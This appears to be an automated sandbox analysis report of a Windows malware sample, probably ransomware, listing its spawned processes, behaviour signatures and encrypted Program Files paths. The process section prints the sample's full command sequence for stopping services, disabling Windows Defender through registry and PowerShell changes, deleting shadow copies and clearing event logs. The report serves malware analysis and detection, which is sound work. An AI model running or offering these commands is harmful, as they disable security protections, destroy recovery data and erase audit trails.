| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
"C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"
C:\Windows\SysWOW64\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SamSs" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "VSS" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "wbengine" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "WebClient" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SysWOW64\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl application
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
Files
memory/672-54-0x0000000000000000-mapping.dmp
memory/584-55-0x0000000000000000-mapping.dmp
memory/1492-56-0x0000000000000000-mapping.dmp
memory/1364-57-0x0000000000000000-mapping.dmp
memory/1852-58-0x0000000000000000-mapping.dmp
memory/1116-59-0x0000000000000000-mapping.dmp
memory/900-60-0x0000000000000000-mapping.dmp
memory/1120-61-0x0000000000000000-mapping.dmp
memory/436-62-0x0000000000000000-mapping.dmp
memory/1200-63-0x0000000000000000-mapping.dmp
memory/1216-64-0x0000000000000000-mapping.dmp
memory/676-65-0x0000000000000000-mapping.dmp
memory/1904-66-0x0000000000000000-mapping.dmp
memory/1660-67-0x0000000000000000-mapping.dmp
memory/632-68-0x0000000000000000-mapping.dmp
memory/1148-69-0x0000000000000000-mapping.dmp
memory/1096-70-0x0000000000000000-mapping.dmp
memory/1928-71-0x0000000000000000-mapping.dmp
memory/1720-72-0x0000000000000000-mapping.dmp
memory/1080-73-0x0000000000000000-mapping.dmp
memory/1696-74-0x0000000000000000-mapping.dmp
memory/612-75-0x0000000000000000-mapping.dmp
memory/932-76-0x0000000000000000-mapping.dmp
memory/1944-77-0x0000000000000000-mapping.dmp
memory/1736-78-0x0000000000000000-mapping.dmp
memory/1704-79-0x0000000000000000-mapping.dmp
memory/1240-80-0x0000000000000000-mapping.dmp
memory/1648-81-0x0000000000000000-mapping.dmp
memory/112-82-0x0000000000000000-mapping.dmp
memory/276-83-0x0000000000000000-mapping.dmp
memory/1120-84-0x0000000000000000-mapping.dmp
memory/1480-85-0x0000000000000000-mapping.dmp
memory/1512-86-0x0000000000000000-mapping.dmp
memory/1284-87-0x0000000000000000-mapping.dmp
memory/1684-88-0x0000000000000000-mapping.dmp
memory/1228-89-0x0000000000000000-mapping.dmp
memory/1428-90-0x0000000000000000-mapping.dmp
memory/1964-91-0x0000000000000000-mapping.dmp
memory/868-92-0x0000000000000000-mapping.dmp
memory/1796-93-0x0000000000000000-mapping.dmp
memory/1484-94-0x0000000000000000-mapping.dmp
memory/1728-95-0x0000000000000000-mapping.dmp
memory/1620-96-0x0000000000000000-mapping.dmp
memory/784-97-0x0000000000000000-mapping.dmp
memory/864-98-0x0000000000000000-mapping.dmp
memory/1832-99-0x0000000000000000-mapping.dmp
memory/1332-100-0x0000000000000000-mapping.dmp
memory/2024-101-0x0000000000000000-mapping.dmp
memory/1008-102-0x0000000000000000-mapping.dmp
memory/1792-103-0x0000000000000000-mapping.dmp
memory/1932-104-0x0000000000000000-mapping.dmp
memory/1952-105-0x0000000000000000-mapping.dmp
memory/1740-106-0x0000000000000000-mapping.dmp
memory/1616-107-0x0000000000000000-mapping.dmp
memory/776-108-0x0000000000000000-mapping.dmp
memory/1744-109-0x0000000000000000-mapping.dmp
memory/1208-110-0x0000000000000000-mapping.dmp
memory/1328-111-0x0000000000000000-mapping.dmp
memory/700-112-0x0000000000000000-mapping.dmp
memory/1768-113-0x0000000000000000-mapping.dmp
memory/472-114-0x0000000000000000-mapping.dmp
memory/1776-115-0x0000000000000000-mapping.dmp
memory/1076-116-0x0000000000000000-mapping.dmp
memory/1316-117-0x0000000000000000-mapping.dmp
memory/1376-118-0x0000000075F21000-0x0000000075F23000-memory.dmp
memory/1376-120-0x0000000002380000-0x0000000002FCA000-memory.dmp
memory/1376-119-0x0000000002380000-0x0000000002FCA000-memory.dmp
memory/1376-121-0x0000000002380000-0x0000000002FCA000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4e230dd18980fbe3b34c4d3ef2f33f8a |
| SHA1 | d8236222ce1f417c445c17624e4cffce0abd4137 |
| SHA256 | 109c8a822a3b6d7b6f1010adf0b88c1b38006b1b3e21e689ace3455ccfe1b294 |
| SHA512 | 12ebbec1e065c6a0fa92b2b32b8a9b849cb09a473676247b6b2ce3cf3c0bb334901569d783ff237400d178b7e97160f2be8e6bb64693bb49d88289330972a8a2 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-13 11:04
Reported
2022-01-13 11:09
Platform
win10-en-20211208
Max time kernel
61s
Max time network
156s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Access2019VL_MAK_AE-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_Ws6CBxLTbs40.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_SubTest-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_K2JruS0H3fQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-black_scale-80.png.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_8wKWajy-rrA0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookbig.gif.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_pNHacr3Xsbc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_ja_4.4.0.v20140623020002.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_MlYmERBRnyk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\invalid32x32.gif.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_eBD8aEEB7Mo0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Retail-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_PGeNiQcssP80.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365EduCloudEDUR_Subscription-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_yk7D3S0XPoY0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]_INqwEbPi3pc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_Subscription-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_plkOpLyaTAg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessVL_MAK-pl.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_SPDDfPCob7I0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\THIRDPARTYLICENSEREADME.txt.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_PNuCQJ0fyls0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\cpyr.htm.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_4JdhLJLnDCU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Orange.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_MOwtg_uMcDs0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019R_Retail-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_kUnBnXJpnbY0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\en-US\msdaprsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-templates.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_xX2PQ3br4KM0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-core.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_SMl1u7JMklw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\PublisherVL_MAK-pl.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_nSCftRHmmnc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART12.BDR.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_cAPihrHLzl40.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]_r0TT6LtOwNw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ja-JP\FlickLearningWizard.exe.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_zh_CN.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_RiSPKIEzKYU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Trial-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_kXpOdpzuI7I0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_OEM_Perp-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_mEizp4cMadE0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_Retail-pl.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_cNKw_qf0ENs0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_1ArEvNlE2E80.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_RtBlita_xy80.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Trial-pl.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_CFi9eZpZqbw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\en-US\boxed-split.avi | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_ACScJJ_f6ds0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\WordR_Grace-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_Dj_L17njakk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\offsymsl.ttf.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_LGl3-uH_uiM0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.text.nl_ja_4.4.0.v20140623020002.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_4dEjXRrpuNQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-snaptracer.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_I34Ak0ZbI-M0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\flavormap.properties.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_DBeYSq6_32s0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_SubTest-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_rlQy0tLOI5o0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Retail-ul-phn.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_KHzEKTH6Mb40.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_zRMoBhpNd180.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.batik.util.gui_1.7.0.v200903091627.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_JmSdlk9ZeMI0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_ja.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_3yqDP-VjRNE0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-stil.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_YITotZ8vXPI0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
